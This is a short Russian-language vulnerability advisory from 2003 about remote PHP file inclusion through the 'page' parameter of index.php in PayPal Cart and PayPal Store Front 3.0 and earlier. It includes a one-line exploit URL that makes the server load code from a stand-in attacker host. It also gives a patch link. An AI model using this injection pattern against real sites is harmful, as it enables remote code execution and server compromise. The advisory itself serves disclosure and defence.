Выполнение произвольного PHP кода в PayPal Cart и PayPal Store Fron

Дата публикации:
10.10.2003
Всего просмотров:
847
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PayPal Cart
PayPal Store Front 3.x
Уязвимые версии: PayPal Cart, PayPal Store Front 3.0 и более ранние версии

Описание: Уязвимость обнаружена в PayPal Cart и PayPal Store Front. Злонамеренный пользователь может выполнить произвольный PHP код на уязвимом сервере.

Программное обеспечение не проверяет параметр "page" в сценарии "index.php". В результате удаленный пользователь может выполнить произвольный PHP код с привилегиями Web сервера.

Пример/Эксплоит:

http://www.vulnsite.com/index.php?do=ext&page=http://www.attacker.com/index
Где http://www.attacker.com/index.php

URL производителя:http://www.muziqpakistan.net/~taz/

Решение: Установите неофициальное исправление: http://www.zone-h.org/download/file=4957

Ссылки: ZH2003-30SA (security advisory): file inclusion vulnerability in PayPal Store Front

или введите имя

CAPTCHA